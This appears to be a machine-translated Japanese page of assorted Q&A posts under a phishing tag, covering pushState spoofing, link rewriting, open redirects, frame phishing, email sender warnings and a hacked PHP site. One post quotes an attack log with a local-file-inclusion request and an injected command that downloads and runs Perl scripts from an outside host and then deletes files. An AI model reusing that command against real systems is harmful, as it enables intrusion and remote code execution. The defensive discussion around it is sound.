問題タブ [phishing]

GitHubのブログに見られるように、ツリーブラウジング用のHTML5のJavaScriptpushState機能（最新のブラウザー用）を実装し、ハッシュバングなしでAJAXナビゲーションを実現しました。

コードは単純です：

これにより、非常にエレガントに次のことが可能になります。

1. ページ全体ではなく、AJAXを介して新しいコンテンツだけをリクエストする
2. トランジションをアニメーション化する
3. そして、ブラウザのURLを変更します（ Twitterのようにだけでなく— twitter.com/stackexchange→twitter.com/#!/stackexchange）#

私の質問は、JavaScriptが、pushStateあるWebサイトが別のWebサイトを模倣して、説得力のあるフィッシング攻撃を引き起こすのをどのように防ぐのかということです。

少なくとも、ドメインは変更できないようですが、サイト内の複数のパスについてはどうでしょうか。複数の無関係で信頼できないコンテンツプロバイダーによる可能性があります。あるパス（IE / joe）は本質的に別のパス（pushState / jane）を模倣し、悪意のある目的で模倣コンテンツを提供できますか？

次のコードのパフォーマンスの問題が心配です

すべての URL がクリーンである可能性は 98% です。3 つの URL の検索には約 6 ～ 9 秒かかります (プロファイリングなし、ランダム検索)。処理の性質上、一度にすべての URL を検索することはできません。毎回ループせずに複数の URL を検索するより良い方法はありますか?

リンクの場所をコピーしようとしたり、Facebook でリンクを開こうとしたりすると、リンクが変更されてl.php.

たとえば、私はに送ることができます

私のブラウザはリンクのプレビューを としてレンダリングしますがhttp://www.google.com/。

今日、Firebug を使用して詳しく調べたところ、Facebook がonmousedown="UntrustedLink.bootstrap($(this)[...]タグ<a>を挿入していることがわかりました。2 番目にリンクを右クリックするとhref、Firebug の属性が変更されました。

これは心配です。

私たちの多くが技術に詳しくない人に与えたアドバイス (フィッシングの被害に遭わないように、クリックする前にリンク先を確認してください) は役に立たなくなったようです。これはセキュリティ上のリスクではありませんか? フィッシング Web サイトはこれを悪用できませんか?

onmousedownブラウザは、属性の変更を許可しないかhref、属性を読み取る前に JavaScript を実行して、この動作を防がないのはなぜhrefですか?

編集: フィッシングのリスクよりも私を悩ませているのは、ユーザーが誤解されていることであり、信頼できるソースによるものであるかどうかにかかわらず、これが発生する可能性があることは単に間違っていると感じていることを簡単に強調したいと思います.

私のウェブサイトはフィッシング目的で攻撃されました。複雑なウェブサイトですが、私は投稿ファイルとPHPファイルのみを使用しています。

彼らはどうやって私を攻撃することができますか？私は$_POSTのみを使用しているので、SQLコマンドとパラメーターは表示されないと思います。私の小さなコーディングリストとWebサイトへのアクセスだけのフレームワークはありません。

任意のヒント/提案をいただければ幸いです。

直接返信しない場合は申し訳ありませんが、サイト全体をブロックしたプロバイダーと取引しています。

これが彼らの答えです（それについてのコメントは歓迎されます）：

スクリプトインジェクションはサイトコード自体を攻撃するため、Webサーバーのセキュリティを完全に回避することができます。残念ながら、一部のコンテンツ管理システム（特に古いバージョンのJoomla）は、この形式の攻撃の影響を非常に受けやすくなっています。

攻撃者がこの方法を使用する機能を削除する簡単な方法は、次のコンテンツを含むphp.iniファイルをWebサイトのトップレベルに追加することです。ただし、Webサイトは後でテストして、正当なWebサイトのスクリプト化されたアクションは、変更の影響を受けています。

php.iniディレクティブは...

allow_url_include = "0"

allow_url_fopen = "0"

アップデート：

これが私がウェブホスト会社から得たものです：

121.254.216.170 --- [2011年9月12日：05：21：07 +0100] "GET /?p=../../../../../../../../ ../../../../../../../proc/self/environ%00 HTTP / 1.1 "200 5806"-"" http://some.thesome.com/etc/ byz.jpg？-O / tmp / cmd548; cd / tmp; lwp-download http://some.thesome.com/etc/cup.txt ; perl cup.txt; rm -rf * .txt *; wget http： //some.thesome.com/etc/update.txt;perl update.txt; rm -rf * .txt *'）; echo \ "＃j13mb0t \" ;?> "

Alice は Bob から重要なリソースの場所を知りたがっています。ボブは親切にもアリスに場所を教えますが、アリスはどのようにしてボブの身元を確認できますか?

Bob は OpenBSD サーバーであり、データのソースは Python/C++ アプリです。

私のアイデアは：

アリスはボブの公開鍵を知っています。

Alice は Bob の公開鍵でランダムな文字列を暗号化し、Bob に送信します。

ボブはランダムな文字列を復元し、それをハッシュします。Bob は機密リソースをハッシュと共に送り返します。

この方法の問題点は、Bob (サーバー) に秘密鍵を安全に保存できるかどうかです。どのように？より良い解決策はありますか？

私の .net アプリケーションはフレームを使用しています。現在、フレームを介して行われるフィッシングがあります。プログラムで制御できる方法はありますか。また、そのようなフィッシング攻撃を見つけるためのツールを提案してください。

URL をチェックして、危険なサイトではないかどうかを確認できるサービスはありますか?

ユーザーが信頼できないリンクをクリックしてアプリケーションを終了すると、「終了してもよろしいですか」というリダイレクト画面が表示されます。ユーザーにも警告する必要があるかどうかを簡単に確認するのはいい感じです。

親要素の境界内に子 html 要素を強制的に配置する方法。絶対に配置された子要素でさえ、親要素の境界内に留まる (またはクリップされる)。

これを行っているのは、子コンテンツの作成者が絶対配置要素で「ページ コンテンツをオーバーライド」するのを防ぎたいからです。

iframe を使用したくありません。私の最善の解決策は、javascript を使用して、スタイル位置が「絶対」または「固定」に設定されたすべての子要素を検索し、それらを「静的」に変換することですが、JavaScript 以外のアプローチを使用することをお勧めします。どんな助けも良い助けです。

注意: style="position:relative;" の設定 親要素に対しては、 style="position:absolute;"を持つ子要素に対してのみ解決します であり、style="position:fixed;"ではありません

www.example.com/?q=http://www.evilsite.comのようなURLを入力することを禁止し 、代わりに404ページなどにリダイレクトする方法を考えていました。ご覧のとおり、これによりフィッシングの脆弱性が発生します。以前のインストールがリダイレクトするのを見たので、どういうわけかこれが可能であることを私は知っています

参考までに、現在クリーンURLを有効にしています。私のインストールはdrupal6.xです

.net アプリからアカウント アクティベーション メールを送信しています。

差出人アドレスを「xyz.support@gmail.com」に設定し、差出人名を「xyz」に設定しました。ここで、xyz はドメインの名前、つまり当社の Web サイトです。

送信中に資格情報を Google に提供したため、Google の SMTP サーバーを使用していたときは問題ありませんでした。しかし今、私は自分の Web サーバーの SMTP を使用して電子メールを送信しています。

Gmail でアクティベーション メールを表示すると、次のように表示されます。

このメッセージは xyz.support@gmail.com から送信されたものではない可能性があります 詳細はこちら フィッシングを報告

gmail や他のクライアントがこのメッセージを表示しないように、これを取り除く方法はありますか?

コードは次のとおりです。

ありがとう